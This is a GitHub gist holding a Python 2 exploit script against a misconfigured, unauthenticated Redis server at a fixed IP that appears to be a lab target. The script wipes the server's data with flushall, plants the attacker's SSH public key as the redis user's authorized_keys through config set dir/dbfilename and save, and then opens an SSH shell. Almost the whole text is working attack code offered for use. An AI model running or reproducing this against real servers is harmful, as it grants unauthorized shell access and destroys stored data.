Created
November 18, 2019 09:28
-
-
Save kNgF/0b2295e115317360f218c82820a1593a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#Author : Avinash Kumar Thapa aka -Acid | |
#Twitter : https://twitter.com/m_avinash143 | |
##################################################################################################################################################### | |
import os | |
import os.path | |
import sys | |
from termcolor import colored | |
ip_address = "10.10.10.160" | |
username = "redis" | |
PATH='/usr/bin/redis-cli' | |
PATH1='/usr/local/bin/redis-cli' | |
def ssh_connection(): | |
shell = "ssh -i " + '$HOME/.ssh/id_rsa '+ username + "@" +ip_address | |
os.system(shell) | |
if os.path.isfile(PATH) or os.path.isfile(PATH1): | |
try: | |
print colored('\t*******************************************************************', "green") | |
print colored('\t* [+] [Exploit] Exploiting misconfigured REDIS SERVER*' ,"green") | |
print colored('\t* [+] AVINASH KUMAR THAPA aka "-Acid" ', "green") | |
print colored('\t*******************************************************************', "green") | |
print "\n" | |
print colored("\t SSH Keys Need to be Generated", 'blue') | |
os.system('ssh-keygen -t rsa -C "acid_creative"') | |
print colored("\t Keys Generated Successfully", "blue") | |
os.system("(echo '\r\n\'; cat $HOME/.ssh/id_rsa.pub; echo \'\r\n\') > $HOME/.ssh/public_key.txt") | |
cmd = "redis-cli -h " + ip_address + ' flushall' | |
cmd1 = "redis-cli -h " + ip_address | |
os.system(cmd) | |
cmd2 = "cat $HOME/.ssh/public_key.txt | redis-cli -h " + ip_address + ' -x set cracklist' | |
os.system(cmd2) | |
cmd3 = cmd1 + ' config set dbfilename "backup.db" ' | |
cmd4 = cmd1 + ' config set dir' + " /var/lib/"+username+"/.ssh/" | |
cmd5 = cmd1 + ' config set dbfilename "authorized_keys" ' | |
cmd6 = cmd1 + ' save' | |
os.system(cmd3) | |
os.system(cmd4) | |
os.system(cmd5) | |
os.system(cmd6) | |
print colored("\tYou'll get shell in sometime..Thanks for your patience", "green") | |
ssh_connection() | |
except: | |
print "Something went wrong" | |
else: | |
print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment